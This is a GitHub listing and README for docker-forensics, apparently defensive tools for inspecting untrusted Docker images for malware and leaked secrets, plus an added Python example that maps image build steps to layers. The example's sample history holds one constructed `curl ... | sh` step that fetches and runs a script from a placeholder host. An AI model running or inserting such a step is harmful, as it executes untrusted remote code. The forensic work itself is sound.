https://github.com/innovativeinventor/docker-forensics
Simple, but useful forensic tools to inspect the history and provenance of a Docker image. Used to investigate potential backdoors/malware.
docker forensics
- Host: GitHub
- URL: https://github.com/innovativeinventor/docker-forensics
- Owner: InnovativeInventor
- License: gpl-3.0
- Created: 2021-09-03T06:25:28.000Z (almost 5 years ago)
- Default Branch: main
- Last Pushed: 2022-08-23T22:41:07.000Z (almost 4 years ago)
- Last Synced: 2025-07-12T08:37:11.027Z (12 months ago)
- Topics: docker, forensics
- Language: Python
- Homepage:
- Size: 16.6 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
## Docker-forensics
In the real world, you are sometimes handed a Docker image of dubious provenance.
This repo houses some useful scripts/tools I've made to analyze and verify untrusted Docker images for backdoors or malware.
In short, these are lightweight reversing tools for black-box Docker images.
## Example usage
Fetching [nginx](https://hub.docker.com/_/nginx) images:
```bash
python fetch.py nginx
```
Unpacking:
```bash
bash unpack.sh
```
## Example analysis
From here, you can inspect the unpacked filesystems normally. For example, to search for a string or a filename:
```bash
rg [some string]
fd [some filename]
```
You can also run `clamav` or other static analyzers to look for suspicious files.
```bash
bash clamscan.sh
```
Or, you can look for leaked secrets.
```bash
bash secrets.sh
```
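Before grepping the unpacked filesystems, an investigator usually wants the build history of the image: which `RUN`/`ADD` step produced which layer tarball. The following is an added example, not part of the repo's own scripts; it parses the `manifest.json` and image config inside a `docker save` tarball and pairs each history entry with its layer path (empty-layer entries such as `CMD` or `ENV` have no filesystem diff). The `sample:latest` tarball it builds is constructed here purely for demonstration.

```python
import io
import json
import tarfile
import tempfile
from pathlib import Path


def image_history(tar_path):
    """Return (config_name, history) for a single-image `docker save` tarball.

    Each history entry is {"created_by": <build step>, "layer": <layer tar path or None>}.
    Layer tarballs are listed in the same order as the non-empty history entries.
    """
    with tarfile.open(tar_path) as tar:
        manifest = json.load(tar.extractfile("manifest.json"))
        entry = manifest[0]  # assumption: tarball contains exactly one image
        config = json.load(tar.extractfile(entry["Config"]))
    layers = iter(entry["Layers"])
    history = []
    for h in config.get("history", []):
        layer = None if h.get("empty_layer") else next(layers)
        history.append({"created_by": h.get("created_by", ""), "layer": layer})
    return entry["Config"], history


def build_sample_image(path):
    """Constructed tarball mimicking `docker save` layout (not a real image)."""
    config = {"history": [
        {"created_by": "/bin/sh -c #(nop) ADD file:abc in /"},
        {"created_by": "/bin/sh -c #(nop)  CMD [\"sh\"]", "empty_layer": True},
        # constructed entry: the kind of build step a reviewer would want to inspect
        {"created_by": "/bin/sh -c curl -fsSL http://example.invalid/setup.sh | sh"},
    ]}
    manifest = [{"Config": "cfg.json", "RepoTags": ["sample:latest"],
                 "Layers": ["l1/layer.tar", "l2/layer.tar"]}]
    with tarfile.open(path, "w") as tar:
        for name, obj in (("manifest.json", manifest), ("cfg.json", config)):
            data = json.dumps(obj).encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        for layer in manifest[0]["Layers"]:  # empty placeholder layer tarballs
            tar.addfile(tarfile.TarInfo(layer), io.BytesIO(b""))
    return path


if __name__ == "__main__":
    sample = build_sample_image(Path(tempfile.mkdtemp()) / "sample.tar")
    for step in image_history(sample)[1]:
        print(f"{step['layer'] or '(no layer)':>14}  {step['created_by']}")
```

Run it against a real `docker save <image> -o image.tar` to see which layer directory holds the files created by a given build step.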